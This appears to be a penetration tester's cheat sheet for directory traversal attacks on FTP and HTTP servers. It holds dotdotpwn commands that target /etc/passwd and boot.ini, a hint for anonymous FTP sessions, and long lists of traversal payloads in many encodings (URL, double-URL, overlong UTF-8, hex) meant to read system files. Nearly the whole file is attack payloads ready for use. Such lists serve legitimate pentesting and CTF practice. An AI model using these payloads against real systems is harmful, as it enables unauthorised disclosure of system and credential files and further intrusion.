################
#ftp dirtrav
dotdotpwn -m ftp -t 20 -f /etc/passwd -h IP
dotdotpwn -m ftp -t 20 -f boot.ini -h IP

################
#try whatever works in ncftp for anon sesh
ncftp IP

################
# ftp dirtrav list
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
..\etc\passwd
..\..\etc\passwd
..\..\..\etc\passwd
..\..\..\..\etc\passwd
..\..\..\..\..\etc\passwd
..\..\..\..\..\..\etc\passwd
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%5cetc%5cpasswd
..%5c..%5cetc%5cpasswd
..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..0x2fetc0x2fpasswd
..0x2f..0x2fetc0x2fpasswd
..0x2f..0x2f..0x2fetc0x2fpasswd
..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd
..0x2f..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd
..0x5cetc0x5cpasswd
..0x5c..0x5cetc0x5cpasswd
..0x5c..0x5c..0x5cetc0x5cpasswd
..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd
..0x5c..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%255cetc%255cpasswd
..%255c..%255cetc%255cpasswd
..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd
..%c0%2fetc%c0%2fpasswd
..%c0%2f..%c0%2fetc%c0%2fpasswd
..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
..%c0%afetc%c0%afpasswd
..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

################
#http dirtrav list
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/..%5Cetc%5Cpasswd
/..%5C..%5Cetc%5Cpasswd
/..%5C..%5C..%5Cetc%5Cpasswd
/..%5C..%5C..%5C..%5Cetc%5Cpasswd
/..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
/..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
/..%2fetc%2fpasswd
/..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/..%5cetc%5cpasswd
/..%5c..%5cetc%5cpasswd
/..%5c..%5c..%5cetc%5cpasswd
/..%5c..%5c..%5c..%5cetc%5cpasswd
/..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
/..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
/..0x2fetc0x2fpasswd
/..0x2f..0x2fetc0x2fpasswd
/..0x2f..0x2f..0x2fetc0x2fpasswd
/..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd
/..0x2f..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd
/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fetc0x2fpasswd
/..0x5cetc0x5cpasswd
/..0x5c..0x5cetc0x5cpasswd
/..0x5c..0x5c..0x5cetc0x5cpasswd
/..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd
/..0x5c..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc0x5cpasswd
/..%252fetc%252fpasswd
/..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%255cetc%255cpasswd
/..%255c..%255cetc%255cpasswd
/..%255c..%255c..%255cetc%255cpasswd
/..%255c..%255c..%255c..%255cetc%255cpasswd
/..%255c..%255c..%255c..%255c..%255cetc%255cpasswd
/..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd
/..%c0%2fetc%c0%2fpasswd
/..%c0%2f..%c0%2fetc%c0%2fpasswd
/..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
/..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
